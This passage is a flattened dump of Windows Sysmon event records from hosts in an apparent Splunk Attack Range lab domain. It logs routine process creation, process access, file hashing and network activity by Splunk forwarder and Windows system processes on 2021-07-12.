Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83C-60EB-DC79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810262Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.288{0C1E0330-F83C-60EB-DC79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001054527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:16.595{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61964-false10.0.1.12-8000- 23542300x80000000000000001054526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:25.552{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=128EB9D42E6DDF93C1F0B64740022D1A,SHA256=3DDFF3E8F91D69B0DC619F305D1D35B1244FAF181A12B2E775EC04DB5304077B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810307Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.678{0C1E0330-F83D-60EB-DE79-00000000D001}5203900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810306Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83D-60EB-DE79-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810305Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810304Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810303Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810302Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810301Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810300Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810299Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810298Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810297Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810296Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F83D-60EB-DE79-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810295Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83D-60EB-DE79-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810294Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.523{0C1E0330-F83D-60EB-DE79-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810293Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.428{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A369D341BB5B1950865FA34513722F1,SHA256=C431DFE6B59CF370F2CBA01DF283C48F94B3C133968B89A40E97766C07F2BDDE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810292Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.318{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E51715FBC09282897120AE5B1A3C781D,SHA256=8608182D78B91B47E880638A17DC1E45055839035AA8944BCBE6F3D28C979FCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810291Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.318{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9807F1D7680269CF34454697583D8A68,SHA256=8F23BBED3999905C23212CF32C8DA624F75C91CE62AFBC3F0C9FA9CDAEF7334A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:26.567{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35A1E0B19C39FE78DDD5EEB85B2D751E,SHA256=B001D857E9C9B5E44DB026E28DE098FB96504D199BE82E5ACA0D02D7C121BFF3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810335Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83E-60EB-E079-00000000D001}2556C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810334Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810333Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810332Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810331Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810330Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810329Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810328Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 